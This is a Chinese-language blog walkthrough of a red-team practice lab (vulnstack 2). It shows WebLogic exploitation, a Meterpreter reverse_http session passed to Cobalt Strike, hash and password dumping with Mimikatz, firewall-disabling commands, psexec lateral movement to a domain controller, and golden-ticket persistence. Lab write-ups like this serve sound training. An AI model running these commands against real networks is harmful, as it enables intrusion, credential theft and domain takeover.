ATT&CK红队评估实战靶场二

雨点打透心脏的1/2处 2023-10-15 23:55 50阅读 0赞

## **描述** ##

红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay，EWS relay，PTT(PTC)，MS14-068，GPP，SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。

靶场地址：[漏洞详情][Link 1]

> 环境说明：10.10.10.1/24
> 
> DMZ网段：192.168.1.0/24
> 
> DC：10.10.10.10
> 
> WEB:10.10.10.80\\192.168.1.8
> 
> PC：10.10.10.20\\192.168.1.11

WEB机器开启WebLogic服务

C:\\Oracle\\Middleware\\user\_projects\\domains\\base\_domain\\bin

startWebLogic---以管理员身份运行

![b1be26f087a442d587fa5e80bfe7cd67.png][]

这个窗口不要关闭

![fd482ad5d1d84e4da2ebfdcd1e7c9bc0.png][]

一、信息收集

扫描WEB主机

nmap -sV -T4 192.168.1.8

![d294332d2d714a138d79aab3c6c7233d.png][]

访问80端口，是空白

访问7001端口，发现是WebLogic服务

![a1531c503e1047188c37e8f8698ff41a.png][]

访问控制台：192.168.1.8:7001/console/login/LoginForm.jsp

尝试弱口令登录，被拒绝

![dd4a2b156166432593779038493c02b7.png][]

WeblogicScan 扫描漏洞

发现CVE-2019-2725

![537d82f2b31042fb88a53d5402e0325e.png][]

![56ada560e2eb4cb486b7f4f369835803.png][]

先将防火墙和360关闭

![9e533eb1909847478557c0acb4d83a2b.png][]

web主机存在两个网段

![2cba1ebad01241aa851841449c6f4de3.png][]

####  ####

#### 上线CS ####

创建侦听

![04ee0c52d20e4675a89dc3f13cf8da33.png][]

#### MSF转发会话 ####

> background  
> use exploit/windows/local/payload\_inject  
> set payload windows/meterpreter/reverse\_http  
> set DisablePayloadHandler true  
> set lhost 192.168.1.134  
> set lport 8855  
> set session 1

![489cdc6a3c9f49f796d2aa1becc48593.png][]

![33cd65c9755d46b3b7727f4dc9021d4f.png][]

CS收到会话

设置睡眠：sleep 1

![6ff0ea243e0040d7962f0b325565ae40.png][]

提升权限

利用插件：MS14-058漏洞提升权限

![74f03692fd0542c5a8408b7b797f9ccf.png][]

扫描端口

explore--port scan--选择10.10.10.0网段扫描

![0b43da6c4df94f46b785684764b54f4a.png][]

发现三台内网主机![7eba152a70494b23b76ec75c233e786f.png][]

**获取hash**

hashdump \#获取hash

logonpasswords \#获取明文密码

![2a6e32233d344f5e99c3e872b21fb59a.png][]

**查看域控**

> 关闭防火墙：netsh advfirewall set allprofiles state off  
> 查看有几个域：net view /domain  
> 查看域名：net config workstation  
> 查看域内主机：nei view  
> 查询域内用户：net user /domain  
> 查看域管理员：net group "domain admins" /domain

![d65dac62669c4b6daba701f9badc138c.png][]

使用CS自带功能，RunMinikatz获取hash和明文密码

![ee99eda5765548a88725b5520215e1b3.png][]

**创建SMB侦听器**

name：自定义

payload：选择beacon SMB

save

![20132e7275924f38b1017eae00f657e9.png][]

### **Psexec** ###

目标需要开放445端口和admin

上线DC

![6a5deaf6279241698ce5c0c1e3fd048b.png][]

选择de1ay\\administrator账户

![698fee6045f0468fae77f431484ea140.png][]

Listener选择刚才创建的SMB

![fd2d96d01dd34fc6aa4a351f82d078b3.png][]

session选择

![21e9cacb31ea47f68814cb4b6dc624ca.png][]

上线DC

![35ec48771f0540c48715c5a0eccf38e7.png][]

上线PC与上线DC步骤一致

![4d3f86ccaf074b53a240aaa7e0f42e68.png][]

##  ##

#### **权限维持** ####

在域控获得KRBTGT账户NTLM密码哈希和SID，然后复制保存到记事本！

![3a6e5ff155fe4253b01b22da6a4e586a.png][]

![a358259c68354c49ae50e8cbfb90cadc.png][]

域名：de1ay.com

![4982c8b85ff64f168a46318d7f5d6a65.png][]

**黄金票据利用**

黄金票据是伪造票据授予票据（TGT），也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心（KDC）证明用户已被其他域控制器认证。

**黄金票据的条件要求：**

> 1.域名称
> 
> 2.域的SID值
> 
> 3.域的KRBTGT账户NTLM密码哈希
> 
> 4.伪造用户名

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限，上面已经获得域控的 system 权限了，还可以使用黄金票据做权限维持，当失去域控权限时，内其他在通过域任意机器伪造票据重新获取最高权限。

WEB主机 Administrator账户权限-t>右键->Access->Golden Ticke

![de54eab8bbab4a6e95f52b1a8974f2a4.png][]

![d8a62ad63c6c42399d7881c504fc3f47.png][]

伪造成功

![eb85b9dae01643c78c3f5b3dd076e0e4.png][]

查看当前系统的票据：

mimikatz kerberos::list

![294cc24a042e42169563a16631b61464.png][]

可以访问域控

![431d59c345444c1fac07f8f69d8c22bc.png][]

**使用当前令牌登录PC**

![4bc3e6bffa79427092e3586384483463.png][]

勾选Use session's current access token

![b7c6f110aa1b48cbb3d9085d6ba383d2.png][]

![61663aea77904cdea1be97fbdf56d0d1.png][]

参考：

[ATT&CK实战系列——红队实战（二）-腾讯云开发者社区-腾讯云][ATT_CK_-_-]

[Link 1]: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
[b1be26f087a442d587fa5e80bfe7cd67.png]: https://img-blog.csdnimg.cn/b1be26f087a442d587fa5e80bfe7cd67.png
[fd482ad5d1d84e4da2ebfdcd1e7c9bc0.png]: https://img-blog.csdnimg.cn/fd482ad5d1d84e4da2ebfdcd1e7c9bc0.png
[d294332d2d714a138d79aab3c6c7233d.png]: https://img-blog.csdnimg.cn/d294332d2d714a138d79aab3c6c7233d.png
[a1531c503e1047188c37e8f8698ff41a.png]: https://img-blog.csdnimg.cn/a1531c503e1047188c37e8f8698ff41a.png
[dd4a2b156166432593779038493c02b7.png]: https://img-blog.csdnimg.cn/dd4a2b156166432593779038493c02b7.png
[537d82f2b31042fb88a53d5402e0325e.png]: https://img-blog.csdnimg.cn/537d82f2b31042fb88a53d5402e0325e.png
[56ada560e2eb4cb486b7f4f369835803.png]: https://img-blog.csdnimg.cn/56ada560e2eb4cb486b7f4f369835803.png
[9e533eb1909847478557c0acb4d83a2b.png]: https://img-blog.csdnimg.cn/9e533eb1909847478557c0acb4d83a2b.png
[2cba1ebad01241aa851841449c6f4de3.png]: https://img-blog.csdnimg.cn/2cba1ebad01241aa851841449c6f4de3.png
[04ee0c52d20e4675a89dc3f13cf8da33.png]: https://img-blog.csdnimg.cn/04ee0c52d20e4675a89dc3f13cf8da33.png
[489cdc6a3c9f49f796d2aa1becc48593.png]: https://img-blog.csdnimg.cn/489cdc6a3c9f49f796d2aa1becc48593.png
[33cd65c9755d46b3b7727f4dc9021d4f.png]: https://img-blog.csdnimg.cn/33cd65c9755d46b3b7727f4dc9021d4f.png
[6ff0ea243e0040d7962f0b325565ae40.png]: https://img-blog.csdnimg.cn/6ff0ea243e0040d7962f0b325565ae40.png
[74f03692fd0542c5a8408b7b797f9ccf.png]: https://img-blog.csdnimg.cn/74f03692fd0542c5a8408b7b797f9ccf.png
[0b43da6c4df94f46b785684764b54f4a.png]: https://img-blog.csdnimg.cn/0b43da6c4df94f46b785684764b54f4a.png
[7eba152a70494b23b76ec75c233e786f.png]: https://img-blog.csdnimg.cn/7eba152a70494b23b76ec75c233e786f.png
[2a6e32233d344f5e99c3e872b21fb59a.png]: https://img-blog.csdnimg.cn/2a6e32233d344f5e99c3e872b21fb59a.png
[d65dac62669c4b6daba701f9badc138c.png]: https://img-blog.csdnimg.cn/d65dac62669c4b6daba701f9badc138c.png
[ee99eda5765548a88725b5520215e1b3.png]: https://img-blog.csdnimg.cn/ee99eda5765548a88725b5520215e1b3.png
[20132e7275924f38b1017eae00f657e9.png]: https://img-blog.csdnimg.cn/20132e7275924f38b1017eae00f657e9.png
[6a5deaf6279241698ce5c0c1e3fd048b.png]: https://img-blog.csdnimg.cn/6a5deaf6279241698ce5c0c1e3fd048b.png
[698fee6045f0468fae77f431484ea140.png]: https://img-blog.csdnimg.cn/698fee6045f0468fae77f431484ea140.png
[fd2d96d01dd34fc6aa4a351f82d078b3.png]: https://img-blog.csdnimg.cn/fd2d96d01dd34fc6aa4a351f82d078b3.png
[21e9cacb31ea47f68814cb4b6dc624ca.png]: https://img-blog.csdnimg.cn/21e9cacb31ea47f68814cb4b6dc624ca.png
[35ec48771f0540c48715c5a0eccf38e7.png]: https://img-blog.csdnimg.cn/35ec48771f0540c48715c5a0eccf38e7.png
[4d3f86ccaf074b53a240aaa7e0f42e68.png]: https://img-blog.csdnimg.cn/4d3f86ccaf074b53a240aaa7e0f42e68.png
[3a6e5ff155fe4253b01b22da6a4e586a.png]: https://img-blog.csdnimg.cn/3a6e5ff155fe4253b01b22da6a4e586a.png
[a358259c68354c49ae50e8cbfb90cadc.png]: https://img-blog.csdnimg.cn/a358259c68354c49ae50e8cbfb90cadc.png
[4982c8b85ff64f168a46318d7f5d6a65.png]: https://img-blog.csdnimg.cn/4982c8b85ff64f168a46318d7f5d6a65.png
[de54eab8bbab4a6e95f52b1a8974f2a4.png]: https://img-blog.csdnimg.cn/de54eab8bbab4a6e95f52b1a8974f2a4.png
[d8a62ad63c6c42399d7881c504fc3f47.png]: https://img-blog.csdnimg.cn/d8a62ad63c6c42399d7881c504fc3f47.png
[eb85b9dae01643c78c3f5b3dd076e0e4.png]: https://img-blog.csdnimg.cn/eb85b9dae01643c78c3f5b3dd076e0e4.png
[294cc24a042e42169563a16631b61464.png]: https://img-blog.csdnimg.cn/294cc24a042e42169563a16631b61464.png
[431d59c345444c1fac07f8f69d8c22bc.png]: https://img-blog.csdnimg.cn/431d59c345444c1fac07f8f69d8c22bc.png
[4bc3e6bffa79427092e3586384483463.png]: https://img-blog.csdnimg.cn/4bc3e6bffa79427092e3586384483463.png
[b7c6f110aa1b48cbb3d9085d6ba383d2.png]: https://img-blog.csdnimg.cn/b7c6f110aa1b48cbb3d9085d6ba383d2.png
[61663aea77904cdea1be97fbdf56d0d1.png]: https://img-blog.csdnimg.cn/61663aea77904cdea1be97fbdf56d0d1.png
[ATT_CK_-_-]: https://cloud.tencent.com/developer/article/2130022